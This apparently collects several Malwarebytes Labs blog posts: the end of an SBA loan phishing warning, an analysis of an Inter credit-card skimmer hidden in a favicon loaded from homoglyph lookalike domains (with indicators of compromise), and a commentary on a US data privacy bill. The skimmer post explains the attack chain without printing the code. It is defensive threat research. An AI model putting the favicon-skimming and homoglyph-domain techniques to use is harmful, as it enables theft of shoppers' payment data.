However, we should note that this campaign is quite elaborate and that it would be easy to fall for it. Sadly, the last thing you would want when applying for a loan is to be out of even more money.

If you reply to this email with the completed form containing private information that includes your bank account details, this is is exactly what would happen.

Tips on how to protect yourself

There is no question that people should be extremely cautious whenever they are asked to fill out information online—especially in an email. Fraudsters are lurking at every corner and ready to pounce on the next opportunity.

Both the Department of Justice and the Small Business Administration have been warning of scams pertaining to SBA loans. Their respective sites provide various tips on how to steer clear of various malicious schemes.

Perhaps the biggest takeaway, especially when it comes to phishing emails, is that the sender’s address can easily be spoofed and is in no way a solid guarantee of legitimacy, even if it looks exactly the same.

Because we can’t expect everyone to be checking for email headers and metadata, at least we can suggest double checking the legitimacy of any communication with a friend or by phoning the government organization. For the latter we always recommend to never dial the number found in an email or left on a voicemail, as it could be fake. Google the organization for its correct contact number.

Malwarebytes also protects against phishing attacks and malware by blocking offending infrastructure used by scammers.

The post SBA phishing scams: from malware to advanced social engineering appeared first on Malwarebytes Labs.

Inter skimming kit used in homoglyph attacks

As we continue to track web threats and credit card skimming in particular, we often rediscover techniques we’ve encountered elsewhere before.

In this post, we share a recent find that involves what is known as an homoglyph attack. This technique has been exploited for some time already, especially in phishing scams with IDN homograph attacks.

The idea is simple and consists of using characters that look the same in order to dupe users. Sometimes the characters are from a different language set or simply capitalizing the letter ‘i’ to make it appear like a lower case ‘l’.

A threat actor is using this technique on several domain names to load the popular Inter skimming kit inside of a favicon file. It may not be their first rodeo either as some ties point to an existing Magecart group.

Discovery

We collect information about web threats in various ways: from live crawling websites to finding them or with other tools such as VirusTotal.

While writing rules for hunting is a continuous and time-consuming process, identifying relevant threats within large data sets is also a difficult exercise.

One of our YARA rules triggered a detection for the Inter skimming kit on a file uploaded to VirusTotal. Considering that Inter is a popular framework, we actually get dozens and dozens of alerts each day.

VT
Figure 1: VirusTotal hunting with YARA

This one looked different though because because the detected file was not typical HTML or JavaScript, but an .ico file instead.

One downside of finding files via VT hunting, especially when it comes to web threats, is that we don’t quite know where they come from. Thankfully, this one gave a little bit of a clue when we inspected the file and saw a “gate” (data exfiltration server):

VT gate
Figure 2: Checking the content of a match for any clues

Homoglyph attack

At first glance, we read that domain as ‘cigarpage’ when in fact it is ‘cigarpaqe’. A quick lookup confirmed that the correct website is indeed cigarpage.com and cigarpaqe[.]com is the imposter.

The legitimate site was hacked and injected with an innocuous piece of code referencing an icon file:

compromise
Figure 3: Malicious code injection to load external resource

It plays an important role in loading a copycat favicon from the fake site, using the same URI path in order to keep it as authentic as possible. This is actually not the first time that we see skimming attacks abusing the favicon file.

compare ico
Figure 4: Side by side of the legitimate and decoy sites

The reason why the attackers are loading this favicon from a different location becomes obvious as we examine it more closely. While the legitimate file is small and typical, the one loaded from the homoglyph domain contains a large piece of JavaScript.

JS ico
Figure 5: Embedded data inside the favicon

Skimmer

This JavaScript is the one that originally triggered a detection for our Inter skimming kit YARA rule. The screenshot below shows the form fields on a payment page that are being monitored and their corresponding data.

skimmer inter
Figure 6: Skimming script

The gate used for exfiltration has the same domain that was used to host the malicious favicon file.

Figure 7: Data exfiltration request

Homoglyph attacks with a historic tie to Magecart Group 8

The threat actor did not only target that one website, but several more belonging to the same victim.

Looking at the malicious infrastructure (51.83.209.11), we can see several domains were registered recently with the same homoglyph technique.

maltego graph
Figure 8: Connections between homoglyphs and known infrastructure

Here are the original domain names on the left, and their homoglyph version on the right:

cigarpage.com:cigarpaqe.com
fieldsupply.com:fleldsupply.com
wingsupply.com:winqsupply.com

A fourth domain stands out from the rest: zoplm.com. This is also an homoglyph for zopim.com, but that domain has a history. It was previously associated with Magecart Group 8 (RiskIQ)/CoffeMokko (Group-IB) and was recently registered again after several months of inactivity.

heatmap
Figure 9: RiskIQ heatmap for the domain zoplm.com

The skimming code sometimes referred to as CoffeMokko is quite different from the one involved here. However, according to Group-IB, this threat actor may have reused skimming code from others, in particular Group 1 (RiskIQ) in a skimmer also known as Grelos and seen in several attacks.

In addition, Group 8 was documented in high-profile breaches, including one that is relevant here: the MyPillow compromise. This involved injecting a malicious third-party JavaScript hosted on mypiltow.com (note the homoglyph on mypillow.com).

While homoglyph attacks are not restricted to one threat actor, especially when it comes to spoofing legitimate web properties, it is still interesting to note in correlation with infrastructure reuse.

Combining techniques

Threat actors love to take advantage of any technique that will provide them with a layer of evasion, no matter how small that is.

Code re-use poses a problem for defenders as it blurs the lines between the different attacks we see and makes any kind of attribution harder.

One thing we know from experience is that previously used infrastructure has a tendency to come back up again, either from the same threat actor or different ones. It may sound counter productive to leverage already known (and likely blacklisted) domains or IPs, but it has its advantages, too—in particular, when a number of compromised (and never cleaned up) sites still load third party scripts from those.

We contacted the victim site but also noticed that the malicious code had already been removed. Malwarebytes users are protected against this homoglyph attack.

protection
Figure 10: Malwarebytes Browser Guard protecting shoppers

Indicators of Compromise

Homoglyph domains/IP

cigarpaqe[.]com
fleldsupply[.]com
winqsupply[.]com
zoplm[.]com
51.83.209[.]11

The post Inter skimming kit used in homoglyph attacks appeared first on Malwarebytes Labs.

Data Accountability and Transparency Act of 2020 looks beyond consent

In the United States, data privacy is hard work—particularly for the American people. But one US Senator believes it shouldn’t have to be.

In June, Democratic Senator Sherrod Brown of Ohio released a discussion draft of a new data privacy bill to improve Americans’ data privacy rights and their relationship with the countless companies that collect, store, and share their personal data. While the proposed federal bill includes data rights for the public and data restrictions for organizations that align with many previous data privacy bills, its primary thrust is somewhat novel: Consent is unmanageable at today’s scale.

Instead of having to click “Yes” to innumerable, unknown data collection practices, Sen. Brown said, Americans should be able to trust that their online privacy remains intact, no clicking necessary.

As the Senator wrote in his opinion piece published in Wired: “Privacy isn’t a right you can click away.”

The Data Accountability and Transparency Act

In mid-June, Sen. Brown introduced the discussion draft of the Data Accountability and Transparency Act (which does not appear to have an official acronym, and which bears a perhaps confusing similarity in title to the 2014 law, the Digital Accountability and Transparency Act).

Broadly, the bill attempts to wrangle better data privacy protections in three ways. First, it grants now-commonly proposed data privacy rights to Americans, including the rights of data access, portability, transparency, deletion, and accuracy and correction. Second, it places new restrictions on how companies and organizations can collect, store, share, and sell Americans’ personal data. The bill’s restrictions are tighter than many other bills, and they include strict rules on how long a company can keep a person’s data. Finally, the bill would create a new data privacy agency that would enforce the rules of the bill and manage consumer complaints.

Buried deeper into the bill though are two proposals that are less common. The bill proposes an outright ban on facial recognition technology, and it extends what is called a “private right of action” to the American public, meaning that, if a company were to violate the data privacy rights of an everyday consumer, that consumer could, on their own, bring legal action against the company.

Frustratingly, that is not how it works today. Instead, Americans must often rely on government agencies or their own state Attorney General to get any legal recourse in the case of, for example, a harmful data breach.

If Americans don’t like the end results of the government’s enforcement attempts? Tough luck. Many Americans faced this unfortunate truth last year, when the US Federal Trade Commission reached a settlement agreement with Equifax, following the credit reporting agency’s enormous data breach which affected 147 million Americans.

Announced with some premature fanfare online, the FTC secured a way for Americans affected by the data breach to apply for up to $125 each. The problem? If every affected American actually opted for a cash repayment, the real money they’d see would be 21 cents. Cents.

That’s what happens for one of the largest data breaches in recent history. But what about for smaller data breaches that don’t get national or statewide attention? That’s where a private right of action might come into play.

As we wrote last year, some privacy experts see a private right of action as the cornerstone to an effective, meaningful data privacy bill. In speaking then with Malwarebytes Labs, Purism founder and chief executive Todd Weaver said:

“If you can’t sue or do anything to go after these companies that are committing these atrocities, where does that leave us?” 

For many Americans, it could leave them with a couple of dimes in their pocket.

Casting away consent management in the Data Accountability and Transparency Act

Today, the bargain that most Americans agree to when using various online platforms is tilted against their favor. First, they are told that, to use a certain platform, they must create an account, and in creating that account, they must agree to having their data used in ways that only a lawyer can understand, described to them in a paragraph buried deep in a thousand-page-long end-user license agreement. If a consumer disagrees with the way their data will be used, they are often told they cannot access the platform itself. Better luck next time.

But under the Data Accountability and Transparency Act, there would be no opportunity for a consumer’s data to be used in ways they do not anticipate, because the bill would prohibit many uses of personal data that are not necessary for the basic operation of a company. And the bill’s broad applicability affects many companies today.

Sen. Brown’s bill targets what it calls “data aggregators,” a term that includes any individual, government entity, company, corporation, or organization that collects personal data in a non-insignificant way. Individual people who collect, use, and share personal data for personal reasons, however, are exempt from the bill’s provisions.

The bill’s wide net thus includes all of today’s most popular tech companies, from Facebook to Google to Airbnb to Lyft to Pinterest. It also includes the countless data brokers who help power today’s data economy, packaging Americans’ personal data and online behavior and selling it to the highest bidders.

The restrictions on these companies are concise and firm.

According to the bill, data aggregators “shall not collect, use, or share, or cause to be collected, used, or shared any personal data,” except for “strictly necessary” purposes. Those purposes are laid out in the bill, and they include providing a good, service, or specific feature requested by an individual in an intentional interaction,” engaging in journalism, conducting scientific research, employing workers and paying them, and complying with laws and with legal inquiries. In some cases, the bill allows for delivering advertisements, too.

The purpose of these restrictions, Sen. Brown explained, is to prevent the aftershock of worrying data practices that impact Americans every day. Because invariably, Sen. Brown said, when an American consumer agrees to have their data used in one obvious way, their data actually gets used in an unseen multitude of other ways.

Under the Data Accountability and Transparency Act, that wouldn’t happen, Sen. Brown said.

“For example, signing up for a credit card online won’t give the bank the right to use your data for anything else—not marketing, and certainly not to use that data to sign you up for five more accounts you didn’t ask for (we’re looking at you, Wells Fargo),” Sen. Brown said in Wired. “It’s not only the specific companies you sign away your data to that profit off it—they sell it to other companies you’ve never heard of, without your knowledge.”

Thus, Sen. Brown’s bill proposes a different data ecosystem: Perhaps data, at its outset, should be restricted.

Are data restrictions enough?

Doing away with consent in tomorrow’s data privacy regime is not a unique idea—the Center for Democracy and Technology released its own draft data privacy bill in 2018 that extended a set of digital civil rights that cannot be signed away.

But what if consent were not something to be replaced, but rather something to be built on?

That’s the theory proposed by Electronic Frontier Foundation, said Adam Schwartz, a senior staff attorney for the digital rights nonprofit.

Schwartz said that Sen. Sherrod’s bill follows on a “kind of philosophical view that we see in some corners of the privacy discourse, which is that consent is just too hard—that consumers are being overwhelmed by screens that say ‘Do you consent?’”

Therefore, Schwartz said, for a bill like the Data Accountability and Transparency Act, “in lieu of consent, you see data minimization,”—a term used to describe the set of practices that require companies to only collect what they need, store what is necessary, and share as little as possible when giving the consumer what they asked for.

But instead of ascribing only to data minimization, Schwartz said, EFF takes what he called a “belt-and-suspenders” approach that includes consent. In other words, the more support systems for consumers, the better.

“We concede there are problems with consent—confusing click-throughs, yes—but think that if you do consent plus two other things, it can become meaningful.”

To make a consent model more meaningful, Schwartz said consumers should receive two other protections. First, any screens or agreements that ask for a user’s consent should not include the use of any “dark patterns.” The term describes user-experience design techniques that could push a consumer into a decision that does not benefit themselves. For example, a company could ask for a user’s consent to use their data in myriad, imperceptible ways, and then present the options to the user in two ways: one, with a bright, bold green button, and the other in pale gray, small text.

The practice is popular—and despised—enough to warrant a sort of watchdog Twitter account.

Second, Schwartz said, a consent model should require a ban on “pay for privacy” schemes, in which organizations and companies could retaliate against a consumer who opts into protecting their own privacy. That could mean consumers pay a literal price to exercise their privacy rights, or it could mean withholding a discount or feature that is offered to those who waive their privacy rights.

Sen. Brown’s bill does prohibit “pay for privacy” schemes—a move that we are glad to see, as we have reported on the potential dangers of these frameworks in the past.

What’s next?

Because Congress is attempting—and failing—to properly address the likely immediate homelessness crisis that will kick off this month due to the cratering American economy colliding with the evaporation of eviction protections across the country, an issue like data privacy is probably not top of mind.

That said, the introduction of more data privacy bills over the past two years has pushed the legislative discussion into a more substantial realm. Just a little more than two years ago, data privacy bills took more piece-meal approaches, focusing on the “clarity” of end-user license agreements, for example.

Today, the conversation has advanced to the point that a bill like the Data Accountability and Transparency Act does not seek “clarity,” it seeks to do away with the entire consent infrastructure built around us.  

It’s not a bad start.

The post Data Accountability and Transparency Act of 2020 looks beyond consent appeared first on Malwarebytes Labs.